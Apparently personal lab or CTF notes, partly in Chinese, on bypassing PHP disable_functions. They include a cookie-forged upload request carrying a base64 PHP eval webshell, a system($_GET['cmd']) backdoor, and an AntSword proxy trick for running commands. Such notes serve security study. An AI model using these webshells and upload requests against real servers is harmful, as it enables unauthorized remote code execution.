Bypass Disable_functions

created: "2026-01-27 12:48"
tags:
  - Bypass
  - PHP
aliases:
Type:
title:
updated: "2026-01-27 12:50"

http://www.mi1k7ea.com/2019/08/03/%E4%BB%8E%E8%9A%81%E5%89%91%E6%8F%92%E4%BB%B6%E7%9C%8B%E5%88%A9%E7%94%A8PHP-FPM%E7%BB%95%E8%BF%87disable-functions/

1. Bypass disable_functions

GreatWall > 2.2. Bypass disable_functions

POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close

imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==

HTTP/1.1 200 OK
Date: Wed, 21 Jan 2026 06:42:50 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8

{"src":"upload/2026-01-21-6970756a83fcf.php"}

上传webshell，然后用蚁剑连接

Pasted image 20260121144738.png
点击开始后就会上传一个.antproxy.php 文件，同目录下新建一个shell.php

#/var/www/html/OAsystem/upload/shell.php
<?php system($_GET['cmd']);?>

Pasted image 20260121145108.png

修改 .antproxy.php 将url指向我们这个shell.php
Pasted image 20260121145236.png

此时访问这个时候我们访问.antproxy.php 相当于访问shell.php

GET http://172.28.23.26/upload/.antproxy.php?cmd=whoami HTTP/1.1
Host: 172.28.23.26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Connection: close

Pasted image 20260121145725.png

Pasted image 20260121145930.png
这里是get请求的后门，